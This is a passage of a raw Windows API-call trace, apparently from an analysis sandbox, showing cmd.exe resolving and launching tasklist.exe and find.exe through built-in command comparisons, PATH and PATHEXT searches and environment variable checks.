_wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0124.921] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0124.921] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0124.921] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0124.921] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0124.921] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0124.921] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0124.922] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0124.922] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0124.922] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0124.922] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0124.922] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0124.922] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0124.922] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0124.922] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0124.922] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0124.922] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0124.922] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0124.922] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0124.922] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0124.922] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0124.922] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0124.922] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0124.922] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0124.922] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0124.922] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0124.922] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0124.922] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0124.922] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0124.922] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0124.922] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0124.922] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0124.922] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0124.922] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0124.922] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0124.922] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0124.922] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0124.922] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0124.922] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0124.922] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0124.922] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0124.922] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0124.922] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0124.922] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0124.922] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0124.922] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0124.923] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0124.923] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0124.923] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0124.923] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0124.923] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0124.923] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0124.923] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0124.923] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0124.923] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0124.923] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0124.923] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0124.923] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0124.923] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0124.923] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0124.923] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0124.923] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0124.923] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0124.923] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0124.923] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0124.923] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0124.923] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0124.923] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0124.923] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0124.923] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0124.923] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0124.923] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0124.923] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0124.923] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0124.923] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0124.923] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0124.923] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0124.923] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0124.923] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0124.923] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0124.923] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0124.923] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0124.923] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0124.923] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0124.924] SetErrorMode (uMode=0x0) returned 0x0 [0124.924] SetErrorMode (uMode=0x1) returned 0x0 [0124.924] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1045228, lpFilePart=0xdff4bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdff4bc*="Desktop") returned 0x1c [0124.924] SetErrorMode (uMode=0x0) returned 0x1 [0124.924] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.924] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.928] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.928] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0xffffffff [0124.928] GetLastError () returned 0x2 [0124.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0x1045530 [0124.929] FindClose (in: hFindFile=0x1045530 | out: hFindFile=0x1045530) returned 1 [0124.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0xffffffff [0124.929] GetLastError () returned 0x2 [0124.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0x1045530 [0124.929] FindClose (in: hFindFile=0x1045530 | out: hFindFile=0x1045530) returned 1 [0124.929] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.929] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.929] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0124.929] SetErrorMode (uMode=0x0) returned 0x0 [0124.929] SetErrorMode (uMode=0x1) returned 0x0 [0124.929] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x104a3c0, lpFilePart=0xdff264 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdff264*="Desktop") returned 0x1c [0124.929] SetErrorMode (uMode=0x0) returned 0x1 [0124.929] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.929] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.929] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.929] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0xffffffff [0124.930] GetLastError () returned 0x2 [0124.930] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0x1045628 [0124.930] FindClose (in: hFindFile=0x1045628 | out: hFindFile=0x1045628) returned 1 [0124.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0xffffffff [0124.930] GetLastError () returned 0x2 [0124.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0x1045628 [0124.930] FindClose (in: hFindFile=0x1045628 | out: hFindFile=0x1045628) returned 1 [0124.930] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.930] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.930] GetConsoleTitleW (in: lpConsoleTitle=0xdff4ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0124.931] InitializeProcThreadAttributeList (in: lpAttributeList=0xdff418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xdff3fc | out: lpAttributeList=0xdff418, lpSize=0xdff3fc) returned 1 [0124.931] UpdateProcThreadAttribute (in: lpAttributeList=0xdff418, dwFlags=0x0, Attribute=0x60001, lpValue=0xdff404, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xdff418, lpPreviousValue=0x0) returned 1 [0124.931] GetStartupInfoW (in: lpStartupInfo=0xdff450 | out: lpStartupInfo=0xdff450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.931] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.932] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0124.933] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xdff3a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdff3ec | out: lpCommandLine="tasklist", lpProcessInformation=0xdff3ec*(hProcess=0x64, hThread=0x60, dwProcessId=0x5f8, dwThreadId=0x6b0)) returned 1 [0124.936] CloseHandle (hObject=0x60) returned 1 [0124.936] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.937] GetEnvironmentStringsW () returned 0x10442d8* [0124.937] FreeEnvironmentStringsA (penv="=") returned 1 [0124.937] DeleteProcThreadAttributeList (in: lpAttributeList=0xdff418 | out: lpAttributeList=0xdff418) [0124.937] _get_osfhandle (_FileHandle=3) returned 0x54 [0124.937] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0124.937] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0124.937] _close (_FileHandle=5) returned 0 [0124.937] _dup (_FileHandle=0) returned 4 [0124.937] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0124.937] _close (_FileHandle=3) returned 0 [0124.937] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0124.937] SetErrorMode (uMode=0x0) returned 0x0 [0124.937] SetErrorMode (uMode=0x1) returned 0x0 [0124.937] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x10442e0, lpFilePart=0xdff4bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdff4bc*="Desktop") returned 0x1c [0124.937] SetErrorMode (uMode=0x0) returned 0x1 [0124.937] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.937] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.937] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.937] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0xffffffff [0124.938] GetLastError () returned 0x2 [0124.938] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0x1045628 [0124.938] FindClose (in: hFindFile=0x1045628 | out: hFindFile=0x1045628) returned 1 [0124.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0xffffffff [0124.938] GetLastError () returned 0x2 [0124.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xdff248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdff248) returned 0x1045628 [0124.938] FindClose (in: hFindFile=0x1045628 | out: hFindFile=0x1045628) returned 1 [0124.938] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.938] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.938] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0124.938] SetErrorMode (uMode=0x0) returned 0x0 [0124.938] SetErrorMode (uMode=0x1) returned 0x0 [0124.938] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1044668, lpFilePart=0xdff264 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdff264*="Desktop") returned 0x1c [0124.938] SetErrorMode (uMode=0x0) returned 0x1 [0124.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.938] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.939] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.939] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.939] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0xffffffff [0124.939] GetLastError () returned 0x2 [0124.939] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.939] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0x10404a0 [0124.939] FindClose (in: hFindFile=0x10404a0 | out: hFindFile=0x10404a0) returned 1 [0124.939] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0xffffffff [0124.939] GetLastError () returned 0x2 [0124.939] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xdfeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xdfeff0) returned 0x10404a0 [0124.939] FindClose (in: hFindFile=0x10404a0 | out: hFindFile=0x10404a0) returned 1 [0124.939] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.939] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.939] GetConsoleTitleW (in: lpConsoleTitle=0xdff4ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0124.940] InitializeProcThreadAttributeList (in: lpAttributeList=0xdff418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xdff3fc | out: lpAttributeList=0xdff418, lpSize=0xdff3fc) returned 1 [0124.940] UpdateProcThreadAttribute (in: lpAttributeList=0xdff418, dwFlags=0x0, Attribute=0x60001, lpValue=0xdff404, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xdff418, lpPreviousValue=0x0) returned 1 [0124.940] GetStartupInfoW (in: lpStartupInfo=0xdff450 | out: lpStartupInfo=0xdff450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", 